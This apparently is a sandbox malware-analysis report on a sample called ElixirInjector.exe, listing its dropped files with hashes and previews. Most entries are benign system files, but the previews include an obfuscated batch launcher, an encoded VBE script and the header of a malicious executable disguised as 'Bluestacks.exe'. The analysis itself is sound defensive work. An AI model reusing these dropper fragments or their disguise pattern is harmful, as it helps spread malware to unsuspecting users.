SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

Download File

Process:	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fvXBwqYdGYPkplbuTcoXecCdP.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.006124400658085
Encrypted:	false
SSDEEP:
MD5:	3FD7630E6C29B02E0FFA6A1D3FB54564
SHA1:	CA880B8896A98A6A2A46FB65611E07B78C4107AC
SHA-256:	E5619477716ECB045FE2484E4C7318B58522BABF1CC931C6EA50603499400625
SHA-512:	AA7E5DA85CC85499B0B8149D3BE9BDB767C606BCBFE54EF549B8DA65D1591A1E8014E5F1B43E281A8957DAA7BD0C68B66903FCB56E734A745981D623B2570D48
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:
MD5:	013016A37665E1E37F0A3576A8EC8324
SHA1:	260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256:	20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512:	99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat

Download File

Process:	C:\Users\user\Desktop\ElixirInjector.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.998986667097069
Encrypted:	false
SSDEEP:
MD5:	AA898D60B0BC1941439402668A8A16B3
SHA1:	9574950945FC837FE9FF07EE3CA6C32185842E0E
SHA-256:	046BFE53D5F3E0658D97EEADA7719219544DA9CF16508A1E85B0BFE7831388A8
SHA-512:	5964F3294D9A7E8CCBE4D8C2C5FD66EDC5AD28BD4B5C9664C67FF74F85852AE7D3FA45F42862821F91E94F4CE03C248A858B0E8A4026EF66CDCE72C96159A2FF
Malicious:	false
Preview:	%qBunbk%%lnKdyeXEmOuoW%..%EMlJBfW%"%Temp%\WinRAR/data/bin/unistall/Bluestacks.exe"%tUYmlUQUNYY%

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

Download File

Process:	C:\Users\user\Desktop\ElixirInjector.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	150484992
Entropy (8bit):	0.19755066131239787
Encrypted:	false
SSDEEP:
MD5:	E18151C31580AA91CEB01099DE4277B2
SHA1:	979C02265019C77ADA5578B1CFC1A98A65F5F095
SHA-256:	2A01AA8E358B9A949A198CA22EA8FA189990D3004467E600136142D7D97E3D08
SHA-512:	C7CEAE4B46C186C8F36ACA7B6334E116BD42E9A164CCF382F4F29298CAC4790BA1BEA7E90DDB738A6DE925890202BFE65D606A83C9C13665701CA9C712DC915A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 59%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................$ ..........B .. ...` ...@.. ........................ ...........@..................................B .K....` . ..................... ...................................................... ............... ..H............text...." .. ...$ ................. ..`.rsrc... ....` ......& .............@....reloc........ ......* .............@..B.................B .....H.......T...................S...B ......................................0..........(.... ........8........E...............N...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ........8........0..Q....... ........8........E....)...........r.......M.......8$...8.... ....~....{}...:....& ....8....8.... ....~....{o...9....& ....8.......... ....~....{k...:x...& ....8m...~....(_... .... .... ....s....~....(c....... ....~....{p...:-...& ....8"...

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe

Download File

Process:	C:\Users\user\Desktop\ElixirInjector.exe
File Type:	data
Category:	dropped
Size (bytes):	240
Entropy (8bit):	5.834873778689293
Encrypted:	false
SSDEEP:
MD5:	86D5FA5E3228E9586230609C34CDEEC7
SHA1:	1E27F4CF478A2BB3A99491476E74C7968B811EED
SHA-256:	A68460A1A574480FFA92D8D4FBE8636D5A32CC3DA84936BCB3B47D829A7E588D
SHA-512:	D4B15B180AB9887F0547193CD42F7273C82BF53F228DF74F64424ED684342BC7717669F909A7A156CC0E37A6415A12FDDEB7D27C9CC12058D93CE64E2345BC79
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^1wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uzqkx"b"&NmYCz(kU&!xkkOl^VzJ.r;lqwytb13HCPhnuHR\pVOj?pO_+^baGVR8mYr~PZ~,Wl^/nckQAAA==^#~@.

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\b76422b20dc1e4

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	ASCII text, with very long lines (699), with no line terminators
Category:	dropped
Size (bytes):	699
Entropy (8bit):	5.847008415051712
Encrypted:	false
SSDEEP:
MD5:	CE02F7D090B2EFD68B8DB14861906EAD
SHA1:	9D09B025635F08D0818A713481B38F7C1760C883
SHA-256:	731F474C50EA368C95AEB73BDD736280F85215ECD94EFAC48D953D4B8873D408
SHA-512:	0E43F61503C88002E118F97E080BB78AC42236E486A6D86DD9EEAAF9A0CF847E8FA5FC9C85D9A3EFC99A1BCB62764CB3D89C523A48FB62F30255B4C560DF7103
Malicious:	false
Preview:	LW5xHHHcv9umj80A9fM78kv3x0gBN1yJBTGW80Ek08hxDasNF29U8RskkCARlFO4KlkP2dBJamHAD80XHT6V1eKtlfw60x9vtmnbzcVm103WKrhmLmKSI3Dpb1oWqETmmWQaUZho7TeAlxi38JvNnrm0j7A7y95whQtybGRwFfUyZCEnSvYhTF95ta1XYk08YrdUDub119IHWxag2WoCkYcbRxEBO4XfpWarjujiTgpT71j59VeB5xX9PBCQqam7mnc9Xt6IxGtEtIeaOIB3ZVj29acirT123rrUYkiQYWOyETQGhmBhZthRDk96QYaeP0KBbKBnjvfCGvxqJWAFRTdKJaRykl996ujNJPoXkX8nOfKRwTx4XUM5X91A3MD8wfGWMkh3rne3Vz5oQ9CQyEllho0JYneYUA1tYxFMw3Mu0SjhEMu3KxJr3eyitXfDJGjV8MQc40d511vOFTFM3kNh0Jz49hcYXIkttNj16R9UTOzCsjcaSTKi3BfyXVdXXEhtQCf1tNQll3OmTxLZEBGE8B0rruekym6OqGvqElqFDj79x3ejJESV8cuOLxK8tpw8695NCfVdUBBYE03yQ4buTkPNVgeQasVXw9Dy7RhntzB7bWKU4VszOCpVur1fAECmpnmExF19WxBdjRw9VJWF9fJtTsDPaCnoxYSxuFhyetcbBLvc51J0s7n

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e24qld0.xcb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0h24ua4v.ql1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w4312fq.3rc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11yir20i.std.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kc4oxlp.4zo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rqprbnc.ky3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qjuoh52.ywx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3w5zq25i.xkx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oq5uqwo.moh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uygaq0p.aqq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xm2rhei.y2r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55oyl5ee.zc3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5k4ptfyw.or5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agf4xghd.khu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0upjmxd.j4t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b23vsoj0.kzm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5psn3ah.r1z.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjicbhbw.ubl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqtllfqm.1aw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckiooh4s.nz5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqdrccl4.jgh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cw5ix4dw.k5d.psm1

Download File

